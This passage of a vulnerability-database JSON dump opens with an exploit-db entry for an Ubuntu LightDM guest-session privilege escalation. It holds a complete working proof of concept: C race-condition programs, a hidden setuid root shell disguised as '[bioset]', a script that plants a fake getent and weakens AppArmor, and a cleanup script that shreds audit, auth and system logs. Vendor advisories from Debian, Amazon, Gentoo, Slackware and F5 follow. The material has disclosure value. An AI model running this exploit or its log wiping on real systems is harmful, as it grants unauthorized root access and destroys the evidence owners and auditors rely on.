(>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6\r\n, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),\r\nlibpam-modules, plymouth (>= 0.8.8-0ubuntu18)\r\nPre-Depends: dpkg (>= 1.15.7.2)\r\nRecommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-\r\ngreeter\r\nSuggests: bindfs\r\nConflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0\r\nConffiles:\r\n/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf\r\n/etc/apparmor.d/abstractions/lightdm_chromium-browser\r\ne1195e34922a67fa219b8b95eaf9c305\r\n/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb\r\n/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf\r\nb76b6b45d7f7ff533c51d7fc02be32f4\r\n/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188\r\n/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e\r\n/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e\r\n/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9\r\n/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22\r\n/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf\r\n/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9\r\nDescription: Display Manager\r\nLightDM is a X display manager that:\r\n * Has a lightweight codebase\r\n * Is standards compliant (PAM, ConsoleKit, etc)\r\n * Has a well defined interface between the server and user interface\r\n * Cross-desktop (greeters can be written in any toolkit)\r\nHomepage: https://launchpad.net/lightdm\r\n\r\n@ubuntu:~$\r\n\r\nThe script runs as root when you view the login screen, also known as a\r\ngreeter, to log in as a guest. Ubuntu\u2019s default greeter is Unity Greeter.\r\n\r\n\r\n*Vulnerable code*\r\n\r\nThe vulnerable function is \u2018*add_account*\u2018.\r\n\r\n35 temp_home=$(mktemp -td guest-XXXXXX)\r\n36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')\r\n37 GUEST_USER=${GUEST_HOME#/tmp/}\r\n38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}\r\n\r\nThe guest folder gets created using \u2018mktemp\u2019 on line 35. The attacker can\r\nuse \u2018*inotify*\u2018 to monitor \u2018*/tmp*\u2018 for the creation of this folder.\r\n\r\nThe folder name will likely contain both upper and lower case letters. Once\r\nthis folder is created, we grab the folder name and quickly and create the\r\nequivalent folder with all letters lower case.\r\n\r\nIf we manage to race the \u2018*mv*\u2018 command on line 38, we end up with the\r\nnewly created home for the guest user inside the folder we own.\r\n\r\nOnce we have the guest home under our control, we rename it and replace it\r\nwith a *symbolic link* to a folder we want to take over. The code below\r\nwill then add the new user to the OS. The user\u2019s home folder will already\r\npoint to the folder we want to take over, for example \u2018*/usr/local/sbin*\u2018.\r\n\r\n68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext \"Guest\")\r\n--user-group --shell /bin/bash ${GUEST_USER} || {\r\n69 rm -rf ${GUEST_HOME}\r\n70 exit 1\r\n71 }\r\n\r\nThe attacker can grab the newly created user\u2019s ID and monitor \u2018\r\n*/usr/local/sbin*\u2018 for ownership changes. The ownership will be changed by\r\nthe following \u2018*mount*\u2018.\r\n\r\n78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {\r\n79 rm -rf ${GUEST_HOME}\r\n80 exit 1\r\n81 }\r\n\r\nWe will remove the symbolic link and create a folder with the same name \u2013\r\nto let the guest user to log in. While the guest is logging in, his path\r\nfor finding executable files will include \u2018*bin*\u2018 under his home folder.\r\n\r\nThat\u2019s why we create a new symbolic link to point his \u2018*bin*\u2018 into a folder\r\nwe control. This way we can force the user to execute our own code under\r\nhis user ID. We use this to log out the guest user from his session which\r\nis where we can gain root access.\r\n\r\nThe logout code will first execute the following code:\r\n\r\n156 PWENT=$(getent passwd ${GUEST_USER}) || {\r\n157 echo \"Error: invalid user ${GUEST_USER}\"\r\n158 exit 1\r\n159 }\r\n\r\nThis code will be executed as the owner of the script, i.e. root. Since we\r\nhave already taken over \u2018*/usr/local/sbin*\u2018 and have planted our own \u2018\r\n*getent*\u2018, we get to execute commands as root at this point.\r\n\r\nNote \u2013 We can trigger the guest session creation script by entering the\r\nfollowing two commands.\r\n\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool\r\nswitch-to-guest\r\n\r\n\r\nProof of Concept\r\n\r\nThe Proof of Concept is contains 9 files and they will take advantage of\r\nthe race conditions mentioned above.\r\n\r\n 1. kodek/bin/cat\r\n 2. kodek/shell.c\r\n 3. kodek/clean.sh\r\n 4. kodek/run.sh\r\n 5. kodek/stage1.sh\r\n 6. kodek/stage1local.sh\r\n 7. kodek/stage2.sh\r\n 8. kodek/boclocal.c\r\n 9. kodek/boc.c\r\n\r\nBy running the following scripts an attacker can run root commands:\r\n\r\n@ubuntu:/var/tmp/kodek$ ./stage1local.sh\r\n\r\n@ubuntu:/var/tmp/kodek$\r\n[!] GAME OVER !!!\r\n[!] count1: 2337 count2: 7278\r\n[!] w8 1 minute and run /bin/subash\r\n\r\n@ubuntu:/var/tmp/kodek$ /bin/subash\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@ubuntu:~#\r\n\r\nIf the exploit fails, you can simply run it again.\r\n\r\nOnce you get your root shell, you can optionally clean any exploit files\r\nand logs by executing the below.\r\n\r\nroot@ubuntu:/var/tmp/kodek# ./clean.sh\r\n/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such\r\nfile or directory\r\nDo you want to remove exploit (y/n)?\r\ny\r\n/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a\r\ndirectory\r\n\r\nroot@ubuntu:/var/tmp/kodek#\r\n\r\nboc.c\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <pwd.h>\r\n#define EVENT_SIZE(sizeof(struct inotify_event))\r\n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))\r\nint main(void) {\r\n struct stat info;\r\n struct passwd * pw;\r\n struct inotify_event * event;\r\n pw = getpwnam(\"root\");\r\n if (pw == NULL) exit(0);\r\n char newpath[20] = \"old.\";\r\n int length = 0, i, fd, wd, count1 = 0, count2 = 0;\r\n int a, b;\r\n char buffer[EVENT_BUF_LEN];\r\n fd = inotify_init();\r\n if (fd < 0) exit(0);\r\n wd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM);\r\n if (wd < 0) exit(0);\r\n chdir(\"/tmp/\");\r\n while (1) {\r\n length = read(fd, buffer, EVENT_BUF_LEN);\r\n if (length > 0) {\r\n event = (struct inotify_event * ) buffer;\r\n if (event - > len) {\r\n if (strstr(event - > name, \"guest-\") != NULL) {\r\n for (i = 0; event - > name[i] != '\\0'; i++) {\r\n event - > name[i] = tolower(event - > name[i]);\r\n }\r\n if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)\r\n;\r\n if (event - > mask & IN_MOVED_FROM) {\r\n rename(event - > name, strncat(newpath, event - > name, 15));\r\n symlink(\"/usr/local/sbin/\", event - > name);\r\n while (1) {\r\n count1 = count1 + 1;\r\n pw = getpwnam(event - > name);\r\n if (pw != NULL) break;\r\n }\r\n while (1) {\r\n count2 = count2 + 1;\r\n stat(\"/usr/local/sbin/\", & info);\r\n if (info.st_uid == pw - > pw_uid) {\r\n a = unlink(event - > name);\r\n b = mkdir(event - > name, ACCESSPERMS);\r\n if (a == 0 && b == 0) {\r\n printf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2: %i\\n\",\r\ncount1, count2);\r\n } else {\r\n printf(\"\\n[!] a: %i b: %i\\n[!] exploit failed !!!\\n\", a, b\r\n);\r\n }\r\n system(\"/bin/rm -rf /tmp/old.*\");\r\n inotify_rm_watch(fd, wd);\r\n close(fd);\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nboclocal.c\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <pwd.h>\r\n#define EVENT_SIZE(sizeof(struct inotify_event))\r\n#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))\r\nint main(void) {\r\n struct stat info;\r\n struct passwd * pw;\r\n struct inotify_event * event;\r\n pw = getpwnam(\"root\");\r\n if (pw == NULL) exit(0);\r\n char newpath[20] = \"old.\";\r\n int length = 0, i, fd, wd, count1 = 0, count2 = 0;\r\n int a, b, c;\r\n char buffer[EVENT_BUF_LEN];\r\n fd = inotify_init();\r\n if (fd < 0) exit(0);\r\n wd = inotify_add_watch(fd, \"/tmp/\", IN_CREATE | IN_MOVED_FROM);\r\n if (wd < 0) exit(0);\r\n chdir(\"/tmp/\");\r\n while (1) {\r\n length = read(fd, buffer, EVENT_BUF_LEN);\r\n if (length > 0) {\r\n event = (struct inotify_event * ) buffer;\r\n if (event - > len) {\r\n if (strstr(event - > name, \"guest-\") != NULL) {\r\n for (i = 0; event - > name[i] != '\\0'; i++) {\r\n event - > name[i] = tolower(event - > name[i]);\r\n }\r\n if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)\r\n;\r\n if (event - > mask & IN_MOVED_FROM) {\r\n rename(event - > name, strncat(newpath, event - > name, 15));\r\n symlink(\"/usr/local/sbin/\", event - > name);\r\n while (1) {\r\n count1 = count1 + 1;\r\n pw = getpwnam(event - > name);\r\n if (pw != NULL) break;\r\n }\r\n while (1) {\r\n count2 = count2 + 1;\r\n stat(\"/usr/local/sbin/\", & info);\r\n if (info.st_uid == pw - > pw_uid) {\r\n a = unlink(event - > name);\r\n b = mkdir(event - > name, ACCESSPERMS);\r\n c = symlink(\"/var/tmp/kodek/bin/\", strncat(event - > name,\r\n\"/bin\", 5));\r\n if (a == 0 && b == 0 && c == 0) {\r\n printf(\"\\n[!] GAME OVER !!!\\n[!] count1: %i count2:\r\n%i\\n[!] w8 1 minute and run /bin/subash\\n\", count1, count2);\r\n } else {\r\n printf(\"\\n[!] a: %i b: %i c: %i\\n[!] exploit failed\r\n!!!\\n[!] w8 1 minute and run it again\\n\", a, b, c);\r\n }\r\n system(\"/bin/rm -rf /tmp/old.*\");\r\n inotify_rm_watch(fd, wd);\r\n close(fd);\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nclean.sh\r\n\r\n#!/bin/bash\r\nif [ \"$(/usr/bin/id -u)\" != \"0\" ]; then\r\n echo \"This script must be run as root\" 1>&2\r\n exit 1\r\nfi\r\n/bin/rm -rf /tmp/guest-* /tmp/old.guest-*\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern\r\n.log /var/log/audit/audit.log /var/log/lightdm/*\r\n/bin/echo > /var/log/auth.log\r\n/bin/echo > /var/log/syslog\r\n/bin/dmesg -c >/dev/null 2>&1\r\n/bin/echo \"Do you want to remove exploit (y/n)?\"\r\nread answer\r\nif [ \"$answer\" == \"y\" ]; then\r\n/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*\r\n/bin/rm -rf /var/tmp/kodek\r\nelse\r\nexit\r\nfi\r\n\r\nrun.sh\r\n\r\n#!/bin/sh\r\n/bin/cat << EOF > /usr/local/sbin/getent\r\n#!/bin/bash\r\n/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1\r\n/bin/chmod 4111 /bin/subash >/dev/null 2>&1\r\nCOUNTER=0\r\nwhile [ \\$COUNTER -lt 10 ]; do\r\n/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1\r\nlet COUNTER=COUNTER+1\r\ndone\r\n/bin/sed -i 's/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session\r\n{/\\/usr\\/lib\\/lightdm\\/lightdm-guest-session flags=(complain) {/g' /etc/\r\napparmor.d/lightdm-guest-session >/dev/null 2>&1\r\n/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>\r\n&1\r\n/usr/bin/getent passwd \"\\$2\"\r\nEOF\r\n/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1\r\n\r\nshell.c\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <grp.h>\r\n\r\nint main(void)\r\n{\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n setgroups(0, NULL);\r\n putenv(\"HISTFILE=/dev/null\");\r\n execl(\"/bin/bash\", \"[bioset]\", \"-pi\", NULL);\r\n return 0;\r\n}\r\n\r\nstage1.sh\r\n\r\n#!/bin/bash\r\nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then\r\n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1\r\n/usr/bin/killall -9 boc >/dev/null 2>&1\r\n/bin/sleep 3s\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>\r\n&1\r\n/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc\r\n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell\r\n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh\r\n/var/tmp/boc\r\nelse\r\necho \"[!] run me from /var/tmp/kodek\"\r\nexit\r\nfi\r\n\r\nstage1local.sh\r\n\r\n#!/bin/bash\r\nif [ \"${PWD}\" == \"/var/tmp/kodek\" ]; then\r\n/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1\r\n/usr/bin/killall -9 boc >/dev/null 2>&1\r\n/bin/sleep 3s\r\n/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>\r\n&1\r\n/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc\r\n/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell\r\n/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh\r\n/var/tmp/boc &\r\n/bin/sleep 5s\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool lock\r\nXDG_SEAT_PATH=\"/org/freedesktop/DisplayManager/Seat0\" /usr/bin/dm-tool\r\nswitch-to-guest\r\nelse\r\necho \"[!] run me from /var/tmp/kodek\"\r\nexit\r\nfi\r\n\r\nstage2.sh\r\n\r\n#!/bin/sh\r\n/usr/bin/systemd-run --user /var/tmp/run.sh\r\n\r\n/bin/cat\r\n\r\n#!/bin/sh\r\n/usr/bin/systemd-run --user /var/tmp/run.sh\r\n/bin/sleep 15s\r\n/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/\r\nhead -1 | /usr/bin/awk '{ print $1 }'`", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41923/"}], "debian": [{"lastseen": "2018-10-18T13:48:32", "bulletinFamily": "unix", "description": "Package : python3.2\nVersion : 3.2.3-7+deb7u1\nCVE ID : CVE-2016-0772\n\nIt was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.\n\nFor Debian 7 &quot;Wheezy&quot;, this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\n\nRegards,\n\n- -- \n ,&#x27;&#x27;`.\n : :&#x27; : Chris Lamb\n `. `&#x27;` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2017-03-25T08:53:43", "published": "2017-03-25T08:53:43", "id": "DEBIAN:DLA-871-1:C4200", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201703/msg00029.html", "title": "[SECURITY] [DLA 871-1] python3.2 security update", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:19", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nAn integer overflow vulnerability was found in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. ([CVE-2016-3135 __](<https://access.redhat.com/security/cve/CVE-2016-3135>))\n\nIn the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset. ([CVE-2016-3134 __](<https://access.redhat.com/security/cve/CVE-2016-3134>))\n\nA weakness was found in the Linux ASLR implementation. Any user able to run 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited. ([CVE-2016-3672 __](<https://access.redhat.com/security/cve/CVE-2016-3672>))\n\nDestroying a network interface with a large number of IPv4 addresses keeps a rtnl_lock for a very long time, which can block many network-related operations. ([CVE-2016-3156 __](<https://access.redhat.com/security/cve/CVE-2016-3156>))\n\nA use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. ([CVE-2016-7117 __](<https://access.redhat.com/security/cve/CVE-2016-7117>))\n\n(Updated on 2017-01-19: [CVE-2016-7117 __](<https://access.redhat.com/security/cve/CVE-2016-7117>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.4.8-20.46.amzn1.i686 \n kernel-4.4.8-20.46.amzn1.i686 \n kernel-devel-4.4.8-20.46.amzn1.i686 \n kernel-tools-4.4.8-20.46.amzn1.i686 \n perf-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.8-20.46.amzn1.i686 \n kernel-tools-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-tools-devel-4.4.8-20.46.amzn1.i686 \n kernel-headers-4.4.8-20.46.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.8-20.46.amzn1.noarch \n \n src: \n kernel-4.4.8-20.46.amzn1.src \n \n x86_64: \n kernel-debuginfo-common-x86_64-4.4.8-20.46.amzn1.x86_64 \n perf-debuginfo-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-4.4.8-20.46.amzn1.x86_64 \n kernel-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-devel-4.4.8-20.46.amzn1.x86_64 \n kernel-debuginfo-4.4.8-20.46.amzn1.x86_64 \n perf-4.4.8-20.46.amzn1.x86_64 \n kernel-devel-4.4.8-20.46.amzn1.x86_64 \n kernel-headers-4.4.8-20.46.amzn1.x86_64 \n \n \n", "modified": "2017-01-19T16:30:00", "published": "2017-01-19T16:30:00", "id": "ALAS-2016-694", "href": "https://alas.aws.amazon.com/ALAS-2016-694.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2017-01-10T14:18:03", "bulletinFamily": "unix", "description": "### Background\n\nPython is an interpreted, interactive, object-oriented programming language. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted index file using Python\u2019s dumbdbm module, possibly resulting in execution of arbitrary code with the privileges of the process. \n\nA remote attacker could entice a user to process a specially crafted input stream using Python\u2019s zipimporter module, possibly allowing attackers to cause unspecified impact. \n\nA man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Python 2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-2.7.12:2.7\"\n \n\nAll Python 3 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-3.4.5:3.4\"", "modified": "2017-01-10T00:00:00", "published": "2017-01-10T00:00:00", "href": "https://security.gentoo.org/glsa/201701-18", "id": "GLSA-201701-18", "type": "gentoo", "title": "Python: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:46", "bulletinFamily": "unix", "description": "New python packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/python-2.7.13-i586-1_slack14.2.txz: Upgraded.\n This release fixes security issues:\n Issue #27850: Remove 3DES from ssl module's default cipher list to counter\n measure sweet32 attack (CVE-2016-2183).\n Issue #27568: Prevent HTTPoxy attack (CVE-2016-1000110). Ignore the\n HTTP_PROXY variable when REQUEST_METHOD environment is set, which indicates\n that the script is in CGI mode.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000110\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/python-2.7.13-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/python-2.7.13-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/python-2.7.13-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/python-2.7.13-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/python-2.7.13-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/python-2.7.13-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python-2.7.13-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python-2.7.13-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n42ce2e2375725fd992c17b2afbe4960d python-2.7.13-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0778e88748ade45fba4a7cbee1fd9eb5 python-2.7.13-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n4bee31bcfc23433f0a8b386bb64ad051 python-2.7.13-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nd7f9f71c4ad2ea100f9b96250171c670 python-2.7.13-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nefea4e1f1f61dfd221e5487ce9fa7864 python-2.7.13-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n84e945560483b28283d9f9ef3ef7f329 python-2.7.13-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n0a28044f725982b3eaf647e530c9de85 d/python-2.7.13-i586-1.txz\n\nSlackware x86_64 -current package:\n67d18569672de5dd48e4dda2f7ce0e88 d/python-2.7.13-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg python-2.7.13-i586-1_slack14.2.txz", "modified": "2016-12-28T13:09:54", "published": "2016-12-28T13:09:54", "id": "SSA-2016-363-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.443792", "title": "python", "type": "slackware", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "f5": [{"lastseen": "2017-06-08T00:16:26", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.1| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-11-18T00:19:00", "published": "2016-11-18T00:19:00", "href": "https://support.f5.com/csp/article/K01955184", "id": "F5:K01955184", "type": "f5", "title": "Python smtplib library vulnerability CVE-2016-0772", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}